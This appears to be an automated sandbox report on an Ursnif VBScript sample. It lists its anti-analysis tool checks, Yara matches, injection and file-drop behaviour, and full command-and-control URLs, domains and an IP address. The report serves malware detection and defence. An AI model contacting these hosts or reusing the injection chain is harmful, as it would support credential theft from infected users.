Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmp Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: autoruns.exe
Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmp Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmp Binary or memory string: regshot.exe

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000012.00000003.794954307.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794836470.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794735521.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.797221471.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794770084.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794874719.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794800647.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.859811207.0000000005BE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794900142.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794931081.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.801557253.000000000517C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6704, type: MEMORYSTR
Source: Yara match File source: 18.3.rundll32.exe.527a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.3.rundll32.exe.527a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.3.rundll32.exe.5328d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.3.rundll32.exe.52f94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000002.871947216.0000000004FFF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.799908702.000000000527A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.799937952.00000000052F9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.890326064.00000200BE266000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000012.00000003.794954307.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794836470.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794735521.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.797221471.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794770084.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794874719.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794800647.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.859811207.0000000005BE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794900142.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794931081.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.801557253.000000000517C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6704, type: MEMORYSTR
Source: Yara match File source: 18.3.rundll32.exe.527a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.3.rundll32.exe.527a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.3.rundll32.exe.5328d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.3.rundll32.exe.52f94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000002.871947216.0000000004FFF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.799908702.000000000527A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.799937952.00000000052F9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.890326064.00000200BE266000.00000004.00000001.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 481106 Sample: sample.vbs Startdate: 10/09/2021 Architecture: WINDOWS Score: 100 54 art.microsoftsofymicrosoftsoft.at 2->54 56 resolver1.opendns.com 2->56 62 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->62 64 Multi AV Scanner detection for domain / URL 2->64 66 Found malware configuration 2->66 68 12 other signatures 2->68 9 wscript.exe 2 2->9         started        13 mshta.exe 19 2->13         started        15 WmiPrvSE.exe 2->15         started        17 2 other processes 2->17 signatures3 process4 file5 46 C:\Users\user\AppData\Local\Temp\fum.cpp, PE32 9->46 dropped 72 Benign windows process drops PE files 9->72 74 VBScript performs obfuscated calls to suspicious functions 9->74 76 Deletes itself after installation 9->76 78 Creates processes via WMI 9->78 80 Suspicious powershell command line found 13->80 19 powershell.exe 1 32 13->19         started        23 rundll32.exe 15->23         started        signatures6 process7 file8 42 C:\Users\user\AppData\...\kuljoghz.cmdline, UTF-8 19->42 dropped 44 C:\Users\user\AppData\Local\...\cshxvr3e.0.cs, UTF-8 19->44 dropped 70 Compiles code for process injection (via .Net compiler) 19->70 25 csc.exe 3 19->25         started        28 csc.exe 3 19->28         started        30 conhost.exe 19->30         started        32 rundll32.exe 2 23->32         started        signatures9 process10 dnsIp11 48 C:\Users\user\AppData\Local\...\cshxvr3e.dll, PE32 25->48 dropped 36 cvtres.exe 25->36         started        50 C:\Users\user\AppData\Local\...\kuljoghz.dll, PE32 28->50 dropped 38 cvtres.exe 1 28->38         started        52 atl.bigbigpoppa.com 185.251.90.253, 49818, 49819, 49820 SPRINTHOSTRU Russian Federation 32->52 58 System process connects to network (likely due to code injection or exploit) 32->58 60 Writes registry values via WMI 32->60 40 control.exe 32->40         started        file12 signatures13 process14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.251.90.253
 art.microsoftsofymicrosoftsoft.at Russian Federation
35278 SPRINTHOSTRU true

Contacted Domains

Name IP Active
resolver1.opendns.com 208.67.222.222 true
art.microsoftsofymicrosoftsoft.at 185.251.90.253 true
atl.bigbigpoppa.com 185.251.90.253 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://art.microsoftsofymicrosoftsoft.at/M0s2qYX0svCgNwwi/PPI7Xc5SLSkLQIY/5lrOW2oNgPCEjObB3W/rK9MpeZNZ/UBjNTHqn019AlZCIEx5P/tkwag9cTBuiHiomNMOd/c4Fs5ApV0T_2BnjVwW3gyf/bJPiicUJ8f_2F/p_2BzDHN/AttyzxcYoU5_2FqrCObbGoi/jSm_2BVGxu/KGJY3tUfrdwytDYZ_/2BjCzYCnXysU/C2JbU3dlXVl/5uJ7MQlXxw8eLV/q0zaTcL3CTeSA980379DA/dHPHAS9NwOC9V6VK/lP_2FDVrlGe4ayd/LAmEzNRn3GukTSqHPk/HGsc32BVj/4Gvn4Q9G8MH6Q5yTHXJc/ulutZq7s true
  • Avira URL Cloud: safe
 unknown
http://art.microsoftsofymicrosoftsoft.at/08OHsz1N1FvuG6kjmE/aTh0zMsnZ/SI0oUmCO_2BS5MoLEECj/uZ7K5bJdnYQx3WN05uH/v_2Fm83_2BmFHvZHPW65zA/GW0_2BJDiUD1w/ZK6b_2Bh/StY6HpePFkaOsmwn5z64jk4/hNqOPWlFAk/QdUHTQ0be2zDX_2Bp/gFERm0UEw08y/zSKvozh3BGq/IuojbbR5mE_2FM/dq0z5j8vfE1Mb6ztPRP2X/B41DadMfELfCe7ey/X881VUbPPRiD756/vcgjm_2B6diCc8QiJ8/zWiCv09og/LPjcs0IySRyGzo4FtAjY/MaQN7Yj0rwdcUGBU3Lw/cxZIrRpMI9kt/XnFePhCWR/v true
  • Avira URL Cloud: safe
 unknown
http://art.microsoftsofymicrosoftsoft.at/W7oPFKe8v92MJK/3s9n12Zlxxip0RpYqadjX/SO7W1_2FF9Pkd4OV/Fr1cAJR5yzwxrV5/Jx7W_2FGpEVbkHb92i/nk7onhk3e/t3LARu0x8PsikCuNcG3A/xVZtlmy23EEwScpeJDo/wvuFYBZUTBSU84oV7Elz6G/vj_2F1HMVCKsF/ltj9usP8/bN_2Bx9_2BXwYInwNajYI72/h9Hrv5vhx_/2F82si9cIkqX7v6R4/9UOOaco5x39h/66X8TzwdR07/vkpw_2FwebnNKA/xttU1J1hU1aqHEwJ_2BPb/e_2FLASBRA3M51hv/aDQxYMFh2bS_2BM53oI/t true
  • Avira URL Cloud: safe
 unknown
http://atl.bigbigpoppa.com/HIIzq4V5S2buP7HU_2F/DcYCSfdPvqaYNdJRMij7gI/5MXe0SZWrBJ2g/js7YCX8y/fDLeVNWGS38iu6HBSu0eZQC/bmSTwgO68w/mDzLSD0yv5NsCWUYa/KrMPefIXTo7Y/kYocGyKbfHI/qpROOMC7W3BpuS/FiHxn9Vj_2BE_2BRO1MPS/HSvVFR_2FvFubdta/FMJR0bw3OFOckhz/gihVzVqSiIHGsYLcl_/2FiUzDnO5/Znp2qHqDPmJt_2FKhKU2/B1dWx_2FKsmf5DpcS8Z/eu7lOAGu9ogHBSfDIGfPdL/lCnFrX6yLs9rJ/djJKkMKB/PGYeMNf7nd3nwYWaABiF0QM/d true
  • Avira URL Cloud: malware
 unknown
http://atl.bigbigpoppa.com/LZpNlL8ctf0/9G8k9mmuTSS5tz/8E5AsgXcbJMRL1oRInDsm/26uAVe_2F5ldrkH0/uiu44euzNQd9TRf/1Zb3P4q5F0mc0qdltC/bLlV5uCsx/obqe2ve9g7Th5DnAa17u/ifRiDnyBBWyxfspwjbc/4e64zsAjWvHHh07WM2IgYy/t1JnmxqkM0edm/B_2Fp0Xl/aO6EV9JJQOgg5QsFoCbzQfO/_2BOZLcUIR/ooMrpCxMndVWwPntp/mvRIBZb_2B_2/Beg4_2F_2Fr/I_2FcfrvgLZ_2F/J3NCkzqZf5_2Fr1C_2BZp/h9SFOIo1qkmT8Tal/3qdDBO5XKEdw_2F/4xqo8eXRx/pJscFz7Rq/r true
  • Avira URL Cloud: malware
 unknown
http://atl.bigbigpoppa.com/yycLCxNRZEFU2J4UrQOl/FX7uF3nnSEu1rXBTN4d/LylqoAvPuubQ7SHiRZfBKF/4dapCnHjf6OGO/yl6rivKE/fgvQJKMe8TaTP5ycHGNAJUS/0YTRa2nWMo/en2LMiL2tQIZKUpol/smZ_2B4BmeyI/57ObWaf9NZW/uHAXXMRRQnyL7K/pZ21NZyhAYoU6jMX_2FXx/_2F1viwpW6B_2BQx/yytF1Qgt5sD6QuY/yCiBnG89B2zLl6ouYK/ovFfokaNC/WnbbXZP7gD7mtpGqOSST/2_2Fq_2BjMeuOfq6Yo5/TugSOTNVmBx8AK0VzEQO9D/fxXdG0idPk4t/207vRTOEh/oW true
  • Avira URL Cloud: malware
 unknown